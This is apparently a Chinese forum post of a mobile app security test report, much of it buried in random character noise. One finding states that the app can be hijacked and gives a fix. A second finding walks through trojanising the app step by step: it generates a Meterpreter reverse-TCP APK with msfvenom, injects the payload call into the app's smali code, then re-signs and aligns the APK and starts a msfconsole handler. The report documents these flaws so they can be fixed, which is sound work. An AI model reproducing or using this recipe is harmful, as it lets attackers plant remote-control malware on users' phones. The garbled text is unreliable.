2 e: _0 y- w" p6 ?: C' T) g5 ]! }. V : [: |& T7 f y! y" s5 B0 j& _3 K   / b8 d7 o; d( I; V. f4 [- `8 t 4 n1 r1 M% Q. f! A. D

) U6 B+ P2 H) o# l6 L% t+ I# P & ? j( x8 ?" R8 z

4 T# p, P) N' o( T 1 q# e7 t [1 ~- q' L U2 A6 g9 b 1-2 测试结果 , h: W" E! G' L$ \6 l! ~ ) D# r" _# t" X& G8 [" L I

3 u0 {) e5 D$ ~/ G' {0 | 5 k* M6 f9 J+ ~

) o) ?8 P$ ?& s' Q1 _3 z6 [- H) j3 k 3 o7 x) c7 U, |0 }4 i, r   6 c* |( i# j6 X; y# | / x$ e" y5 k0 B& D; J' O

3 \! ?6 H: i0 S- S1 w" r; Z; H5 h ' t# E4 _2 G% a5 L3 p

* x, m9 }' o9 ]/ [+ G; w4 Z# L t) g2 {8 S; n* p: P- Y% B 2 检测结果                    + D$ M: J: X( R( q$ B" Y4 d, `9 t+ z8 a3 Q

3 z# a+ G6 d/ N1 F% S5 q 5 T( ?$ {1 q+ ~6 G+ `% n/ D+ y/ _$ x

7 ?7 j# l: O# I. M" S6 I6 P. I( E $ }9 M6 P) N9 w 2.1 某某某 * Z7 i; I; h1 b 0 u \( y: B* X6 a- A6 F

4 P1 v2 G+ D; {. ^. K. I% E3 [2 n! g& L2 K' n+ b

; T' p5 E' J+ J: q' z2 S6 }9 Q/ l ( |/ F" [$ {. S; {' P9 c/ y+ [ 2.1.1检测目标 " R- v. y, L% X " L& V/ O$ y8 v E

3 `3 e2 B" s% L. S# a7 I* f # i! ]9 ^' h. L3 B

6 K/ K; J% W* O$ V% b - j4 B4 {! a% S" h/ g# T 目标地址: 某某某某某某APP 8 ~1 x/ O* d# ?/ Z+ D6 y- Z7 U' u+ }

5 B) R5 F. ^! ?6 x. J: }% S8 |0 Q- S2 b 4 ^ U2 D/ @" y

" _$ P2 S$ Q) ~: Q1 S9 _/ L: B' Q 8 Z8 v4 W& f3 V- E, `9 N3 U8 K 2.1.2检测结果 ' ]0 [- ], d/ s `. N 4 ^) ^/ g5 M/ G% m$ G

- [7 U! N1 r$ Z4 m5 u. ~* ~/ v% |1 @% t

4 T8 Z( N3 t7 E) | 1 T9 w% X) B* j+ H! S* C E$ a 2.1.2.1 $ \. i6 J: ]% k! t7 D3 j 3 z7 K1 t0 O3 t0 j* C+ }% Y+ I

0 F* r5 _- f: H/ e) n- t& V \$ Q; R5 U% c

9 d/ i/ B0 g5 Y' t6 M % b* T7 N( _: V; Z2 K' U8 ? 漏洞链接地址:某某某某某某APP , d) _9 A5 p% q' u8 f" n c; _* O" v$ i0 [' O

4 {, f2 z a8 i 2 e. w* T& ?) V5 g

/ t! j" k6 a- l, A& \5 G7 D k7 C0 R& ?% G' X" t   . e, w9 r) f+ ~ % }( a& Q2 n% d1 i3 r6 ?( v

4 q/ N. G$ S, V9 ?$ c) i 6 U# U7 C9 r, P6 [+ Y: | \

+ N$ W3 E2 F' W4 r0 M# x 6 T% G# W N8 w6 p2 w0 J: w 漏洞分析及取证: " n, @3 q% V _( e) F# u3 v * ? n: V/ w7 F Q! p

1 F% C. h( o4 H, b" ?/ y / E- c) y4 k0 j9 O8 b/ h+ z

+ N% r6 u& j5 s5 S4 r w6 X u3 t& N. {: X# D2 f+ a% o                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 7 e8 D. C3 O% X: k: T3 ^3 b 7 y( s; c( j3 r: b9 f+ o

' w3 F: w+ G+ I" r # A p+ E$ B b+ w4 b

6 p: @& [; l& j; r1 q4 _. c & c! E; ?8 X f2 [4 I$ R      ' v) v* W9 \! K+ ?$ r7 R / w$ c/ V# R& c& q) K! v s- M$ y3 U

3 m, l- I7 F5 I( Y * \2 w* H( [; P6 D+ \7 a E

2 w$ ?* B/ J# n) Y7 x$ R- Q! o1 q: s$ Q% z \: z# Z* l                       ( N# L. ?- j7 Q# N2 T* q: p' Y$ D; [7 H F, n. U9 Y/ Y! |: h3 J

" b4 f* x( h7 a5 e& Y3 k4 n* R0 i9 O/ a3 C I% n, b, J

0 h' U' _- @: P( s5 z1 @' H) p+ @3 V* r) m' X ( T5 b4 o, A# J5 |% m 2 L t( B g( V/ d0 U: v2 M

6 g4 v1 J& Q- T% g! s. v1 }, x7 W / x5 a, `& b0 ^

( b$ L; X' A& l( ^' e/ d 3 w& d2 P/ r6 e6 H1 `& H . o7 ^5 u v4 S7 h4 W: n N% i % Y* y5 a$ Q. i7 m& \

7 n( v6 O4 P* F, I. o6 L( f ' j2 c, |, H) l: X

. [$ O) H- o, G1 c, S; C 7 P* r5 M6 j* Q" f 3 O9 E3 f+ o* a) ~% \! z( M+ u* q8 T2 i5 y

9 |/ b7 }: ^% T4 U3 `- n* k% M. w. ?& G2 U$ G: s! C% @

: B) J9 ]% k- O6 }; W8 G " O. d: N* I; n, g& ] 漏洞危害:高 6 {; ^; I/ k* D0 M* g( G9 p; p3 H$ G; `1 v) @8 m

6 F- k% i1 ]4 F9 l# C- X6 H! W+ w- G) A4 |: n
. e2 J# V* Y K. W2 ^! }# g 9 E1 f( z5 B5 X5 K W' S% } : w5 Y' Z5 f9 L# {( f* Y% J: ^% N, |" e7 L1 A/ Y/ W2 A9 B6 z9 q! u' v. N1 P8 Y2 K! m3 }! n9 {$ G, Y' H5 E9 t. H4 L" z3 w8 {$ \( Q: [4 @$ u! i% Y U, |" ~# T% E6 o+ G; r0 _" x1 P' v7 L% ?" v6 T1 t/ i3 ]% F2 M+ N+ E# B' D1 E+ Y) c5 u1 w; u; V: O) G# ^" }- C8 c: h. A& H/ ^ p7 ~& F: z8 p% Q3 I8 m, A2 Q5 u6 y+ ^$ n, I4 A: z" D5 H% `" q4 H( |2 Z, Q8 l, A, y6 n1 M9 `) W, b6 S. Q2 d% T8 X# ]" Y- B& m/ H# ]. |( a* b+ w* j; d9 L/ m9 U7 F- _: ]" J/ G" o9 y( s! w# u: g; L# r: |- R* F1 k: }8 P) _/ Q, x+ u v$ z( I8 y, f, X9 v+ W$ b' ~# a; ^( }; j- N; n# `( {5 ~/ v& T( a0 C
# t7 u- |0 J" v9 H: Y' a 7 |2 r, U( h! c) v( n) z

( J" j4 @3 \: H( S' O* l* h0 C * J% B, B9 C, v& ^% o5 V" I2 G 严重程度 7 D |; A3 D) `1 \7 o- a ! Z+ X- s& ^0 S' _, p" a5 h$ o

. t0 y1 F8 j& B/ _, j2 u 8 {1 ~% D3 |+ k& p/ i
) q& `" ~: j2 s! s/ p " K5 d8 ^! S/ E- _4 p

) N# h6 D' M1 [0 g: d! F6 { / y' \ V, a; e6 ` 0 u6 u; D+ a& t& O0 Q$ _) G5 ^6 f/ K; U" w

. H4 B, z( x9 X. a. p# j: L8 J# P* ^' E) L7 z/ @9 ~# h/ c; \
# G5 G7 a: S1 l; Y, p * f6 d& O" B1 H

6 |9 ~ j2 o( Q( R. r6 `7 _5 [2 Q! |5 R" O% [5 t - Q. d, R2 t9 d3 j+ U* p7 B0 }% t: L) p5 v; X: _& f. B

/ F9 o$ q7 a7 a- b8 x! `0 I ) D, G! F5 m; y% X* p& v n% G
/ f* X& a# e0 x* L/ Y 1 b0 e! p6 u8 q- G- y0 M4 F0 f

9 T; j1 g, o$ G% b9 E# Q0 [ & c! S! \- N3 w( ^4 b 5 `2 K/ s7 z- r. _; ~3 ^% R; N/ i% T/ ]0 d& ^3 T) [

& d; `, R0 x" _- c, x 5 q {2 S8 h; e2 ^0 g: f
& [) i# v6 n2 Z( T. l; Z' G8 x 3 x% c: q* Y" V3 z1 o* ^" {" o! l

0 j$ U" A/ ]" A , [* Y3 ~- `3 N' A6 j7 K   ' C" V1 ]5 C/ @5 A. I4 C . S$ R$ A- R1 s) F

1 S9 W0 y8 O. R5 R 4 @, i. J2 |% S- d
2 S& K3 k* d; M) r' v6 L9 K $ n( I4 {7 ?; T0 K- g

8 w8 M; B/ x0 ~9 n/ P 3 }$ x( r5 ~' n' B6 x- k - W0 @ f4 d8 I/ N& Z ! C: z; m6 W7 |6 P+ b

v6 k' r- L8 w. a( ^# K2 H) p& Q( K6 P* [0 S" i
' `9 Z- q. H o4 ~! }3 u 6 U5 l: r% f6 w+ {

# A1 j) b# v0 T9 h0 P6 o1 D V3 R) K# Q7 ^, g4 \   # d; y4 L6 i$ X9 V: |+ j1 E- z ' y0 e3 l, q `5 P3 H( g

3 D F$ x5 j, _# Q/ q2 x' u. L5 M) o: ]8 ]8 V5 H8 p
6 [- u6 p5 f3 p7 K% o5 S# ? 9 j/ X( y' Q- f5 \$ f: \
' W* q1 L0 X8 K \ B$ _3 P 0 j4 y8 P& L5 u* o5 ?

0 W/ d4 u. _% x. r . t* Y7 y. r1 |0 I; |, R0 b& u* \5 z   " N- m7 A q: n2 l2 ~- k# O* }, E 4 W# @& Q p, E' q) q" s+ u

3 J* z( N8 _6 Q& s , U `: w. p/ R

) P4 K; Z; N' I- x k3 G5 R' z; i8 a: B, T# I7 h7 m 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 + J( m2 \6 J$ c+ T ! s) \: T% I/ G# N5 {! @" z

) A7 B$ k- \1 W0 a / E X* V* ~" f: v8 k, v

% U4 W9 D1 K1 Q 3 ^, B1 T, ]# ?6 c4 _4 P           # {' W( {2 |, u8 D5 Y0 m- H U, _$ I% C. z0 \$ {

6 {5 T' T3 T! G5 t5 @ & Q5 G/ e+ Q; `/ k3 [$ v$ t& w

" {; w3 ^. E3 S 4 I$ s5 K9 O e+ X   $ e1 y( w+ x6 G7 j! X- m " x! Q# v T/ H

- j; D1 j) T0 E8 Z' o9 q, b2 x& @9 x

" H: ]# P5 `" `4 h9 y3 B # |4 b: D( N, e' j, w 2.1.2.2 * x# \9 k$ s# F( O) V3 D9 u# n7 ?# M. V1 y( T! s

. _# I+ s9 W! K: E ; |" `# r/ A6 g! |$ ?

/ Z' I. c9 M, x9 o0 X" Z $ |* \* H, [% A4 E" `( P 漏洞链接地址:某某某某某某APP 6 Y- d+ E- ~ R' Y+ d$ i6 p1 f2 [" M* q! Q9 E& n! Z' a

* ]: |1 w5 O$ M9 Y1 f/ ^ R3 I1 W* p

- a/ b Z/ W2 M C' a 6 ]" l' B3 p# H1 [# a 漏洞分析及取证: g8 v2 [- a$ E: |/ r1 K, K! _ 8 a& S, F: L6 [$ M

& @6 Z& e8 n; O+ x5 D) o 0 R0 |) V! n7 a6 s! u9 m

9 O$ Y/ [- w! O) x7 i8 [0 z1 _" L( Z5 _3 G                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: ! U- r' q0 t+ n# m3 u- C/ F3 B% r3 u2 B8 ] # m* q* J! W+ P: j1 w4 q7 d0 s

9 e1 B" j _ b+ O- C b : }( O' h( V2 n& G

4 Y/ s# P# s& Q1 \! _1 p ) p0 o! {( A2 n% O! o g5 m' | Metasploit 生成木马 apk 5 K. k* V2 `: Z# g 8 M( [2 y( ?# W8 p' L" S- N

1 i0 o+ S6 f H; p1 W 8 w- a9 o1 _' i/ l; p

$ l. ~4 _: i+ y% _* K : j, E8 {7 g( J$ g$ {" l' } msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 1 D6 g1 R, f9 }+ n/ N, \+ w: x: v8 D* _! L5 d

: `7 K0 i2 g, H 4 {0 T0 ~, I7 k1 g- f

5 U2 U5 i2 ]2 b0 `. Z# [( I & s* L& @) ~4 c8 H3 l, Q6 r- M 反编译目标apk和木马apk . _; ~3 _% e7 E% O2 W$ r! A p/ F# X, H1 R1 M

+ N4 _1 c; Z+ I: J4 A" |$ f. { 9 M+ J. y; A2 a0 c' e" I4 @7 C/ ]- F

7 u$ [. ~! w* c1 C0 a' x- d+ ]! h . t& T- r6 b7 |2 d5 \* v) ]1 ` apktool d target.apk
/ _' K/ q1 ~. z1 T8 v) \% C2 o . w& x' Y! H4 s2 z# d( }) u% F* ? apktool d cockhorse.apk
1 m; \; G& ~% S1 k: L& X5 L8 T) t, Z# |( n( z9 t3 W

5 b3 K9 k8 F. |! @1 A8 s% V9 G4 p s5 c7 R . q( f% t% Z. C8 G

+ X8 z, d/ y7 t0 P$ c& v , U0 ?6 P' g. O' e 木马 apk 注入目标 apk / b4 x' m9 ], D& \! A u8 O0 @8 ~9 `( o" z

4 m9 L) ]. p. N: Z' _" E & y8 U1 t( Y; H, j9 d4 U

6 Q! I! a6 k; e: N; \ . g% E. y0 [8 H" L0 w2 N 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
1 l7 l6 W- ~6 r5 K l8 N0 c # j9 ~( S; p; `6 ` invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
) v" {* g# b# x : X7 t+ G9 E6 z2 o

$ Z; G4 S; I; r- H! V0 {/ Z. c7 E( c, U9 V, E" V& r

y: f2 r8 o0 Z! T 7 ]' V& A$ R$ r1 S- X 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 1 a3 \$ V; a. L+ K1 h; X' d9 K ! z+ M, d5 y. n2 n Y) Y* Y+ v# Q L3 v

0 C( N$ m& z$ ^# o; s4 s # C3 S1 F5 x0 i) V

2 A( z" U& M& y0 }6 b. [# B2 Q2 _* D( c& S! v; T 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ $ N$ q7 N. ?+ y+ A( S ) b3 j" u; j) q

1 i/ b1 G2 L$ f& z% g& D# {# I- l0 E; M

! R4 j8 O8 d/ B3 y) G! \: Q, | + H) J2 T& R3 w7 F1 H/ Q 回编译生成最终 apk 7 ?0 J" E) `2 v5 S: F: z" L8 }6 u6 x* P! r% {: [

1 i6 H& N+ ?+ H" t3 x 3 U. `. O }0 C+ E* W8 G

! M* V6 T0 n3 f 9 }- n& Y# ~, c: v! c& G 重新打包 , W1 Q5 f8 l; l& g2 D% t5 o' K : p; H3 A! d* J4 h4 f" a

3 _' y: Y6 J1 _ A: T' R+ O$ D: L( s1 e8 e, N$ l& q& |! B4 {* E

9 e! Z4 R6 c4 B 9 D, L8 X" N9 d apktool b -o repackage.apk target_app_floder ; e- @7 N- D0 t' @' ^/ V- ^( R- \/ l# W+ b: N; c+ J

- [0 K# ?3 F+ N0 P% m$ [4 C& p1 T8 {4 f8 F

( h/ @% j# K' D; S; o; _0 j; V" w. }/ r6 x 创建签名文件,有的话可忽略此步骤 8 h) a, B: K: }6 E4 v m0 A/ J , r. F6 ]% X) W" h- M- \ S5 g: s

' j7 {# ]6 c; r; S 9 g. L+ g+ Z" k

) e8 E" _" m6 ^& B: J- g $ n" F, Q# {# k9 _* {. B keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                ( C0 ^) i1 ?/ R! F3 B' h 7 H$ V% ? V5 U6 ]+ G

E0 I9 x! x$ C2 ]4 @# q . O- f% m0 @& ]. {: R. z4 K" J* c

; p' g* @: m0 a 3 y: y- f! [( J& o/ j' h5 Y 签名,以下任选其一 + K+ A |5 {% |" h% P- b% E 4 l' F/ r! X6 @

, G! k$ o* y; R6 H. h5 A, ]; W) h2 D. \9 ?9 g

5 u! g4 u6 P3 ^) @5 x 5 K( B1 `4 w/ q: y: v jarsigner 方式 7 C) H8 t* ~; m! w$ }& j& v, u 1 V3 q2 V6 T) q2 c: _* g& ^) u% U

0 ]9 t1 B0 ?' N# q( s& P1 y# M# N6 {/ [ 0 R% R0 T- c6 h" u6 Q6 r! K

$ z* }( V# d' c. J 2 E& W, F2 ]9 c1 L8 G jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname , Y" o; Y \% Q9 s7 {6 j' v: k ( p& ^' }, U6 B

. Q! O% Y" Y$ G2 I# b& n1 ~1 `( I$ J* g

7 {, z) U1 l- ^3 N) R H y, s9 K( P9 }2 I1 v apksigner 方式 4 E9 g8 X) B5 b2 a* u" l" ?! t1 f 2 }! J( S, c: Y4 e3 ?* n

9 r7 b- A' g; _" i1 X$ Q . y/ O5 N7 [9 k U: n& p- _+ l

; [ I" l4 c: A$ b4 ? : w7 j- R; ^" v; K M apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk , z( k: W# k" x+ ]: N5 |" j3 E- f) i" s% n3 y1 Y- X

@/ Y: L W$ ~& l0 q * g6 h6 I' Q3 n5 L

/ l. Q6 e" J1 a - q# {0 ?! k5 p" t1 u 如需要禁用 v2签名 添加选项--v2-signing-enabled false 9 v- z- L. f9 G & o+ y5 P! | S- @8 p" ^ s& K% C

' r: z0 R" g% X8 }( A& b 2 M$ b0 L( g6 G g& a! Q

# q. t z) J8 W& p+ X. ^. b 3 m' j+ _; j/ a$ H9 y" @9 z. X% C 验证,以下任选其一 * B* |( G* g. p8 X3 a: O8 [) M! p3 S% d/ E$ k" y

% T' Z' {7 \8 k4 D% m) P7 Y$ Q$ l) J$ p3 D

K6 G: t: x5 x1 H- L- ?4 K 6 i5 v( K2 `/ \' { jarsigner方式 5 {, D0 |6 s+ _7 z% \5 B% X) P/ } 4 C9 ?% z& D1 C9 A) m" M

7 m4 I3 Y) k3 r* [+ m v! b / l2 y+ n% [! Y% ^

5 y g( F1 [7 `( k9 u- V6 C9 `5 q# X+ N; `' n jarsigner -verify repackaged.apk / K1 r& L' P* T3 I! @ ' X: @+ ` r0 ^! \) ~6 w [6 x2 `

5 [8 O |1 T* v4 G0 ~7 ] M4 n% j " Z3 T& w V% U* G L; f

$ s7 M% ?) O6 A0 w3 ?+ _ n$ }6 _* A* u1 B: T5 k apksigner 方式 ( K! p' Z- u r. ?. T 1 W* a7 u/ n& T" u1 l

. E A+ S/ ?8 Z, Z3 H5 o& O/ s; m/ M' z/ O6 k$ m

! r7 \! l3 |6 U% w , ^8 M2 x6 n: D5 O' X apksigner verify -v --print-certs repackaged.apk ! h5 Q8 I$ v m8 W0 V- n; q& x/ X5 Y+ g

( {4 @% N- n ^9 }% q. o- u7 j7 p$ y + w3 C2 t9 v) o9 z+ L! B

$ c, v2 _0 L" K! Z( Q: c# s/ F, P keytool方式 + ? g- z* M7 _$ F _8 ?8 D4 S7 H! I5 g! Q

) a$ M2 b7 J9 M# a/ z( h' r V8 e5 k! S! g3 p

3 e( t; t+ P& z! I$ p ; H8 t# q. G" i' b5 n9 |( h6 }: p keytool -printcert -jarfile repackaged.apk 5 W: ]+ P& ?, E% U ( J; p. b$ q7 |4 ^

) D5 U n# f$ X0 d ' F/ {9 Y0 W; X; ^2 W& i: L

, p, ?1 L8 O. s! `+ U 3 e5 k4 e+ C$ h4 k 对齐 " ^# p; \: r8 W- n5 m ) q1 n u8 T$ R- @" F$ H% \: l

8 q1 X( g: L% n0 Z+ M ; o8 q" ^& G) y

t& K! ^% Q' G: @ 8 Z; S2 Q# }) w, h' Z* J' k, D; ?1 o 字节对齐优化 , w- P; j4 e# d- e0 C " r2 V! \. b( U$ G) J9 o

4 k6 p& X! U5 p S7 b" M" @4 ?: ~ , W* d+ X5 A* d5 [: X4 ^% H

7 ]( i+ V6 U! R1 b) `6 s, x" r" m% _' E+ L5 U+ S) y zipalign -v 4 repackaged.apk final.apk # G3 B* k. d- w/ @0 M" S ( d- Z- k' o W" [! X" `

7 h) R g3 d* x$ H3 O , w. n; l- }- b8 l! l( ?

' W! |# @/ q3 e! Q% s- f ' k% q& u% B# H! B+ \ k$ F 检查是否对齐 - E5 a* Z j4 j+ y; I" `8 ] ( B' E% D, Q7 Q) M }* {1 Y$ K

8 O7 V+ u% Z; H( ^2 ~0 o8 ~- D. K6 f , i, O3 n0 C( [, a/ q

% t& j3 a8 o8 q( o3 Z' W& E0 R - E) {* m# u$ `& P zipalign -c -v 4 final.apk 0 a( z) t% b$ F; z( \+ z+ M' l 8 c1 E: r7 @" I

. ^" e- d8 d' _3 w) G3 r+ l) ~, C5 x7 M9 A

* r/ ~" Q( O6 Z0 W& A0 z, e* l u5 F8 G, }7 v6 b 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 8 C1 U* y- H d- A9 z ( m# q2 Z( m5 V Y4 D

* V% P) Z2 R- W' {4 [ * f+ `; D5 w1 I! V: _4 S

2 X6 F" j7 Q9 c / Z0 t/ A/ r9 y* @6 D5 L 启动Metasploit控制台,配置参数等待上线 ' N% @! E; H ` + o' R% B- \1 B

8 s# m* W3 ?9 C2 X% d: I$ r. W2 D; c2 O% s. n8 C" t

% H# t7 r" }+ U- K' o& X" ]* s* ] # F9 `. `9 h" D/ M0 G 在终端依次输入如下命令 1 ~1 ]4 C4 q( x% o9 n3 _ ) H5 g! [0 ~; u

( L1 K! l7 {& S- D* V$ A% w, d ( H( r* i3 X( W% D6 y- k4 d0 D3 A

8 J* P8 I, h! z. k0 R+ P $ J- F2 a c( j0 i9 S# r+ j c6 S. ~ k msfconsole 7 ?* u, f6 x' j, [ P7 k3 z" {5 w( B3 x. j- Z( Q8 _

J0 @8 W4 ?/ e2 b: ~9 ]8 f * ^3 u2 c \8 ?7 z! S; ?0 a

" K+ _9 B4 I) k+ S, s5 u* _9 Q6 N2 S 6 d. E `! j+ n use exploit/multi/handler 8 R. i$ }8 e) @6 r T, @0 v% _0 w8 S' B! G6 ^; z- E, Y4 c8 Z" h

1 b6 l) b z* g H9 F 4 d4 E! W" ?. ]' m" B3 F

% D4 i+ Q8 O; ^7 w4 r$ U: ~: m' w& v) E set PAYLOAD android/meterpreter/reverse_tcp ) {8 P; N1 }7 J+ S& t( S" q 7 N6 l; \/ A7 q6 w/ d, c o5 p, U

# P+ l6 ]6 Q/ H2 x- C& Q$ O , {$ Z7 u3 h" J4 g0 [9 \! K1 {

8 n+ j: J3 e+ S! }* K9 s 2 {' O3 j4 b0 E8 _# b5 c set LHOST 192.xxx.xx.xx : Z' U v4 b& b. F3 J" f & N' h! X6 M+ h' x5 [9 X( o/ z, L" i

; m0 n g& q6 z; [ 5 v! W& z+ m4 a* o6 r0 L2 t

/ v, {: @2 R5 E! M( z, z( I: Y: |* b C% v: J( f9 O set LPORT 4444 * l" u- G0 Y3 |. }6 T! I + [3 @! {7 w- n0 d- Z+ f! p' c+ `

& E9 I! _ g, U0 G1 o % A9 |5 _, L' t0 t) }+ a1 }

' W, s1 m6 c6 e2 ?2 ?1 |0 q T & C8 t `# Z4 k: f5 f exploit . k! ^3 ~( w) G$ U/ K# G6 t 5 n& i; i5 o; `

& H8 M# m$ G: N" z% g4 s : M; e, l2 B. C

3 i5 I- m) R( D9 F4 T( r* A : e. N J j+ o5 i& r' w8 R1 P 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               % q( K1 S! o' `5 J+ M 8 \$ ~. V9 C. n' w

6 _; C6 X+ [& w0 j; J2 z% n, A' S7 w2 D% o

, ]9 p' [' W6 X8 ~ 9 y8 t8 z4 l4 s& z1 C4 |! u 漏洞危害:中 . ]8 ?: p2 i% j+ D6 w( U, h3 k8 C B

0 m) x/ ]( A/ T! b; G4 I7 `3 p5 X2 w: l7 F& P( n9 U
+ x+ c1 H3 u/ h+ N$ s. x - A* c9 o2 i/ R$ s) O ; g6 _7 z. f4 c4 h9 A# b- z5 @/ t% z. ]) c' t {1 r+ l - d4 H7 o0 \, U& h) i5 t( [ M: ]9 G8 L- w" c" W; e5 V& O0 \5 k) [" p: y/ b P6 [0 y2 O+ w% o( f$ g$ [& x4 U% e7 K' N- _, B7 `. f1 d6 r& k( r8 G( z+ A) ~5 B! A. m; C& X0 X6 i! h& S' n) W& c/ K! C8 U9 u8 t8 }7 E/ e" _& [3 U' x4 p0 a7 o& x) O7 F3 T! J" W* b% b9 U% T6 g& {9 f( K' K! r+ A. c X d4 D! S( t" X- U7 M" }, Q) E5 N, b" G5 a& ^$ ?) L3 b* W1 J1 f( k7 \- Y4 @8 e" U: h/ X/ y9 D; |$ M9 d2 g( Z$ L4 R2 ]5 v! }( c* e8 j0 w* y3 e* W. C# t0 S0 a4 F/ \2 z! Z4 m6 V* v- ?* S& R4 B( y% r' |8 M1 N7 f6 {" A* H6 G/ T( {1 ^$ ]9 ?) r% o% h4 h. p* V- x5 N: C, O0 ^3 z# _7 {. Q1 U% G6 W/ n$ f( z. D, ]; N. p$ }7 g
8 }/ f- Z; Q% p6 G# p" O . b+ S: H H* p' V

7 l- j, |) Z4 |; j) q+ Z: ]7 E9 ]( I3 r 严重程度 & j. y, [, T a" H7 J5 U0 z7 y; U0 W4 C2 R2 Z, v0 c# W2 ]+ P5 P( n

# Z+ J, @9 Q/ n # v3 ]0 L6 J7 U9 C) I: d) }% }
" R7 x( r* M3 n7 l & x$ @, i( j" s4 n% g6 [5 E( o; @% z

( n2 j6 v- O8 X. M- j; R& P; Z& x 8 z$ I% L; ^) a1 `2 r8 f + o" e! |5 b5 |' F& G3 ^8 h ! C& j$ d1 L& Y

/ H* P6 P& \1 E3 r' n( a! ~ + b& |1 J! i7 j8 S- J* W
* J' f& c8 r( A6 L' T: U, D) x7 z$ \! y# z1 [

& A! `; x# K3 l& B: Q( W % Y$ m5 P& V$ z9 d8 D & } k( E, N7 s3 s* c" Y " U4 d8 B' p1 _' j2 H

# A4 F4 g1 S" g7 R2 o z/ L- l5 _/ S1 }/ D
! H/ U' u" {2 x. K & r# B/ \4 y! u6 Q

, K0 c1 t0 _) U5 s/ S / t( B8 E$ I0 L) V' C/ `* x / {- K6 C6 j7 z; i# P1 E% u8 E( F3 E4 F( ]. w7 X3 _

* ~6 C1 H, W8 W& b & | I& R3 Z; X7 f0 h: D5 j
- ]& k5 N( z* z+ I 1 Y% [- a( V, x9 W6 G ' L2 B5 b3 R4 {$ T/ D& Q" M0 S$ `6 e6 ^

% f* j% z9 T4 E H$ P1 D 0 S$ z% c5 y+ O' U8 X0 v   - j" b2 H# k/ M8 n + L( V8 g. E% I1 w

% m" D$ ` h' @$ p% g' F9 U( B+ h* W- I0 t
! Q1 f6 ~# [& Z6 F( {$ e$ d2 v! k* `8 b8 V2 m+ G) A- o/ Q6 y

% r, B, t% J* w4 g1 K- W$ w E* M" a& d* k' ^6 y& x( z! Q" i# n ' i1 x, W' l* n- w1 l " l6 h9 a! e2 P6 z5 g

B/ v6 ]. H/ b1 \$ d; Q $ S! c* t6 V( H0 \+ U1 S
$ z6 Y( R, y$ O+ f3 f ' H3 s8 g% R3 r& z & g! d; _" U" N2 L1 C : O+ X4 N5 M7 L6 R1 v0 J9 X

" h( S8 v/ {& a# n& O ; t) ]8 N9 F( D/ T0 u, h# l" h6 P* n   5 ~9 }: b+ h: y 5 _. e9 K- h; r, l" G, n

) ]# G! Z" ?; d 5 f' p* \+ ~( @( [; A7 M: k! |
. k2 _/ [4 p) F+ H) e/ Z+ _ 6 p8 }8 B; J+ a! r/ F% {
/ |/ F" v- T) P# c# E 6 [1 s D5 L2 Q6 K. [: n

+ m* h3 c' J: n * P5 m% ]% g( C" m6 s   ! w1 ?8 V# ^2 M/ @6 e ! N, U: O. b6 f' V- r9 n

$ d+ o2 a5 o! X# o; n$ b+ p- w & ^( w/ J9 j% R t/ t+ h

# p( a* u, @( Y' T3 m * T9 b* a5 B3 t7 d1 | 修复方法: . [3 e2 i3 w6 T2 P* V2 ^" i2 ]' b 3 D& z' q( n! @# m, j8 k, X

( z& q& ]" Q* D) U- _: X- Z% X& Z% H+ x- J: p

+ c6 Y2 s9 L$ B5 M. Y: p+ G - t6 h& U% `; w: }" |9 T1 u5 ?               1. APP 启动时应做签名校验防止二次打包。
3 f# n1 |( E+ ~, w( O. W 4 t& U2 U) B x# B n+ Z 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 2 s- G7 l% c7 F4 y4 ^) h2 J 2 t. b$ d9 ?' w* J0 `& }

6 k& P N3 S" q) ^& a9 e& U W; e: ~% i+ D / o$ |. ?, q/ A( Y4 o' m5 \ , i& M, F( K' x7 T* ^ W

) c5 J# O* a( w) E1 m + p: Q1 J6 C1 d5 Q7 ]2 z+ i8 R   / o0 X& @( I5 ^* N: D6 w$ J# q ; R( s% l& \( H5 K& v, n

5 q) \, S; `8 p * F1 l5 m6 W, @" T* }8 l : f: o3 {! p$ U( K $ O I! x; F: n* W

( Z0 j$ ^: _$ C2 l ; b4 T! h( x* c4 }% X7 M0 O' ?2 L! ^
( Q4 ?1 ~8 e. G 3 ^! Z4 L- e- x+ \3 n

' t5 f6 i! t, v( V % l5 z) P9 M4 O3 c9 d" _3 O# u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表